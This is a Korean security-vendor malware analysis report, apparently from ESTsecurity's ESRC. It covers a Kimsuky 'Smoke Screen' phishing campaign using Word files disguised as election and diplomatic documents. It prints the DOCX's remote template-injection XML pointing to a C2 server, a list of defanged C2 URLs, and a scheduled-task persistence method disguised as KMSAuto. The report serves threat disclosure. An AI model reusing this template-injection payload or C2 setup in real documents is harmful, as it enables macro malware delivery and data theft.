포스팅 내용

악성코드 분석 리포트

김수키(Kimsuky)조직, 21대 국회의원 선거문서로 사칭한 스모크 스크린 APT 공격 수행



안녕하세요. 이스트시큐리티 ESRC(시큐리티 대응센터)입니다.


김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정되는 공격이 또 한번 포착되어 사용자들의 주의가 필요합니다. 


이번 공격에 사용된 악성 파일은 '21대 국회의원 선거 관련.docx', '외교문서 관련(이재춘국장).docx' 파일을 위장하고 있습니다. 


이번에 발견된 두 개의 악성 워드파일들의 파일명은 다르지만, 동작방식은 동일합니다. 


먼저 악성 DOCX 문서가 실행되면, 아래와 같은 내부 'settings.xml.rels' 명령이 작동하고, 악성 매크로 함수실행을 위해 특정 미리네 호스팅 C2 서버로 통신을 시도합니다.



<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://saemaeul[.]mireene.com/skin/board/basic/bin" TargetMode="External"/>

</Relationships>



DOCX 문서 파일의 작성자는 'seong jin lee' 이름이 등록되어 있으며, 마지막 수정자는 'Robot Karll' 입니다.



<dc:creator>seong jin lee</dc:creator>

<cp:keywords/>

<dc:description/>

<cp:lastModifiedBy>Robot Karll</cp:lastModifiedBy>

<cp:revision>6</cp:revision>

<cp:lastPrinted>2020-04-01T07:10:00Z</cp:lastPrinted>

<dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T06:01:00Z</dcterms:created>

<dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-03T00:14:00Z</dcterms:modified>

</cp:coreProperties>



그리고 다음과 같이 [콘텐츠 사용] 버튼 클릭을 유도하는 문구를 보여줍니다. 만약 C2 서버와 통신이 실패하면 [콘텐츠 사용] 버튼은 나타나지 않습니다.



[그림 1] C2 서버 'saemaeul.mireene[.]com 서버와 통신해 매크로 실행 유도하는 과정

 


사용자가 [콘텐츠 사용] 버튼을 클릭해 실행하면, 사용자에게는 다음과 같은 워드문서의 내용이 보이게 됩니다.   



[그림 2] 21대 국회의원 선거 관련 내용이 담긴 악성 문서 화면



[그림 3] 외교 및 총선 관련 내용이 담긴 악성 문서 화면 



악성 매크로가 실행되면, '.NETFramework4.xml' 파일 이름으로 추가 명령을 생성합니다.



[그림 4] XML 내부 화면



그리고 윈도우 운영체제 정품인증 키관리 서비스(Key Management Service)처럼 KMSAuto 이름으로 작업 스케줄러에 등록해 자동으로 실행되도록 설정합니다.



[그림 5] 작업스케줄러 명령어 화면



C2 명령제어 서버와 다음과 같이 통신을 시도하며, 공격자의 추가 명령에 따라 다양한 정보유출이 진행될 수 있습니다.



http://saemaeul.mireene[.]com/skin/board/basic/bin

http://saemaeul.mireene[.]com/skin/board/basic/bin/report.php

http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=1

http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=2


http://saemaeul.mireene[.]com/skin/visit/basic/log

http://saemaeul.mireene[.]com/skin/visit/basic/log/report.php

http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=1

http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=2



올해 초부터 김수키(Kimsuky) 조직은 국내 기업/기관 등을 대상으로 지속적으로 스모크 스크린 캠페인을 벌이고 있습니다. 





이에 기업 및 기관 사용자들의 각별한 주의가 필요합니다. 


현재 알약에서는 해당 악성코드에 대해 Exploit.MSOffice.Gen, Trojan.Agent.183268E로 탐지중에 있습니다. 


관련 IoC는 쓰렛인싸이드에서 확인하실 수 있습니다. 




티스토리 방명록 작성
name password homepage